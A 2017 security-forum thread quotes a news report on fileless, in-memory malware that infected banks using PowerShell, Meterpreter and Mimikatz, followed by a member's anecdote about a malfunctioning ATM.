Jump to content


Photo
- - - - -

"Invisible" malware


  • Please log in to reply
1 reply to this topic

#1 Tx Redneck

Tx Redneck

    Tx Redneck- The Spam Hunter

  • Anti-Spyware Brigade
  • 5,445 posts
  • Gender:Male
  • Location:On the straight and narrow,stumbling at best, only by Gods grace.



Posted 08 February 2017 - 01:37 PM

https://arstechnica....ound-the-globe/

 

 

 

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plas to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShellMetasploit, and Mimikatz—to inject the malware into computer memory.  
The researchers first discovered the malware late last year, when a bank's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft's NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry.

God will not save you from that which he will perfect you through. Dr Voddie Baucham
If more people would get a divorce from themselves, they might learn how to live happily with someone else.

 


#2 duanester

duanester

    OpenSuSe Movement

  • Anti-Spyware Brigade
  • 21,785 posts
  • Gender:Male
  • Location:Michigan


Posted 13 February 2017 - 10:09 PM

Pulled up at the local Chase bank ATM and noticed Win Vista stuck in a boot loop, Thought to myself, I never use my bank Card in Win OS, Said the heck with it hurried to a working Win ATM to get money and make substantial deposits before it went down from some infection :huh:


When you have eliminated the impossible, whatever remains, however improbable, must be the truth !!
Join the next generation of computing, Open Source, and Linux/GNU!
"nvidia license taints kernel"




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users